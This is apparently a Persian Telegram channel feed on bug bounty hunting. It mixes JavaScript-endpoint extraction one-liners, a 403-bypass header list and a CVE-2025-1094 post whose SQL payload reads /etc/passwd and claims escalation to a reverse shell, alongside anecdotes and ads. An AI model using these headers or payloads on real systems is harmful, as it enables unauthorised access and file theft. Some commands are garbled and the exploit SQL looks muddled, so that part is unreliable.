استخراج. تمامی مسیر ها و اند پوینت ها از فایل های JS برای گیدا کردن باگ🐞

✅Method one

waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu

✅Method two

cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt

#کاربردی

یه توصیه ای که توی این پست ننوشتم این بود که از کوئری زدن فرار کنید
و با ORM ها بنویسینش من خودم با ORM و flask نوشتم

#تجربه

🌋403 Bypass by Header Requests

Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1

#کاربردی

حال انتظار داری آنها را دوس بدارم؟
پروکسی 👉 پروکسی 👉 پروکسی پر سرعت 👉 پروکسی سرعت بالا 👉
دانلودچی 👉 vpn اختصاصی رایگان 👉

از تجربیاتم بخام بگم توی ایران پروژه ای بوده که باگ بانتی من کار کردم روشون حالا یه سری باگ زدم و گزارش کروم بانتیش 2 ماه بعد واریز کردن تو ایران این مشکلات رو هم داریم دوستان
که حالا بعضیا هستن فردای گزارشت میریزن بعضیا دیر تر میریزن دلیل بر بدی و خوبی نیست دلیل بر اینه که خود ایران شرکت ها جرعت نمیکنن واریز بکنن با این افزایش قیمت میگن بزار باشه سرمایس یه مقداری
ولی در کل اگر یه شرکتی دیر کرد واریزی داشت فکر نکنین پولتون خورده (البته اگر جوابتون میدن ولی اگر نمیدن که بیخیالش بشین)

#تجربه

ورژن اولیه ابزار رو ران کردیم 👌 نسبت به چیزی که انتظار داشتم بهتر شده فیچر هاشم کامل کنم میگم چه آپشن هایی داره

#سرگرمی
#ابزار

بررسی آسیب‌پذیری SQL Injection در PostgreSQL و ارتقای آن به RCE با WebSocket🚀

سلام به همه دوستان عزیز! 🌟
در هفته 41 از برنامه GO-TO CVE، به سراغ یک آسیب‌پذیری خطرناک در PostgreSQL رفتیم که در نگاه اول تنها یک SQL Injection ساده بود، اما با یک زنجیره حمله حرفه‌ای توانستیم آن را به Remote Code Execution (RCE) ارتقا دهیم! 😈

📱 Week: 41
🔍 CVE: CVE-2025-1094
💻 Type: SQL Injection → Remote Code Execution
🛠 DBMS: PostgreSQL

🔥 چگونه از یک SQLi ساده به RCE رسیدیم؟
در ابتدا، این آسیب‌پذیری به ما اجازه می‌داد دستورات SQL مخرب را تزریق کنیم و اطلاعات حساس پایگاه داده را استخراج کنیم. اما ما به همینجا قانع نشدیم! با استفاده از چین اتک و ترکیب چندین آسیب‌پذیری دیگر، از جمله یک ضعف در WebSocket، توانستیم کنترل کامل سرور را به دست بگیریم و کد دلخواه خود را اجرا کنیم!

📌 جزئیات فنی آسیب‌پذیری:
1️⃣ این ضعف به مهاجم اجازه می‌دهد از طریق ورودی‌های ناامن، کد SQL را مستقیماً در پایگاه داده اجرا کند.
2️⃣ در PostgreSQL، قابلیت‌هایی مانند COPY FROM PROGRAM و lo_export() می‌توانند در برخی تنظیمات نادرست، مسیر را برای RCE باز کنند.
3️⃣ ما از WebSocket hijacking استفاده کردیم تا بدون نیاز به سطح دسترسی بالا، این زنجیره حمله را به کد اجرایی روی سرور برسانیم.

🔗 PoC و اثبات اجرا روی سرور
🚀 برای تست این آسیب‌پذیری، ما یک WebSocket payload ساختیم که ارتباط بین کلاینت و سرور را Hijack می‌کرد. سپس با تزریق SQLi، یک توابع ناامن در PostgreSQL را فراخوانی کرده و در نهایت Shell Reverse گرفتیم! 😈

📜 PoC:
SELECT lo_export( (SELECT convert_from(pg_read_file('/etc/passwd'), 'UTF8')), '/tmp/payload');

🔥 اجرای این کد در محیط آسیب‌پذیر، امکان خواندن فایل‌های حساس سرور و در نهایت اجرای کد را فراهم می‌کند. برای درک بهتر و exploit کامل به ریپازیتوری زیر مراجعه کنید .

https://github.com/soltanali0/CVE-2025-1094-Exploit/tree/main

🔒 چگونه از این آسیب‌پذیری در امان بمانیم؟
✅ Prepared Statements را جایگزین کوئری‌های مستقیم کنید.
✅ ورودی کاربران را اعتبارسنجی کنید و از فیلترهای امنیتی مناسب استفاده کنید.
✅ دسترسی به توابع حساس PostgreSQL را محدود کنید.
✅ WebSocketها را ایمن کنید و از ارسال اطلاعات حساس در آنها خودداری کنید.
✅ آخرین آپدیت‌های PostgreSQL را نصب کنید و پیکربندی‌های امنیتی را بررسی کنید.

📢 همراه ما باشید و امنیت خود را به سطح بالاتری ببرید! 🔒

🔗 پیوستن به کانال تلگرام:
https://news.1rj.ru/str/GOTOCVE

دوستان هم اکنون آهو آهو بعد از یه مدت طولانی که گزارش میدادم و informative میگرفتم یه آسیب پذیری زدم که قطعا یا دوپلیکیت میشه یا تریاژ
قبلا از همین پروگرام باگ One click Account Take Over زده بودم که چون دامنش Out Of Scope بود قبولش نکردن ولی خب N/A هم نزدن زدنش Infoative ولی این یکی یا تریاژ میشه یا دوپلیکیت

انشالله که تریاژ شه اولین باگ روی هکروان! یالله بگیم به هکروان
https://x.com/CountMoteVaziri/status/1895452700797767816
#تجربه
#سرگرمی

رایت آپ چالش یاشار رو نوشتم انشالله بعد از اتمام چالش میزارم رایت آپ رو اینجا اگه تونستین برین روش بزنید

6 تا فلگ داره

و تنها هشدار منم اینه که دنبال باگ های سمت سرور بگردید

https://x.com/voorivex/status/1897342814708736205

#چالش_استعدادیابی

ویدیو چالش یاشار رو آماده کردم فلگ هاشون رو میزارم بعد از اتمام چالش آپلود میشه

#چالش

یاس 🔥 موزیک رو گوش کردم چیزای قشنگی میگه بعد 3 سال موزیک خوبی رو داده عین همیشه

#سرگرمی

آقا بخونید
https://x.com/Galia_jalili/status/1911473053621788871?t=MahxvafIPdMenCxuPO9MSg&s=19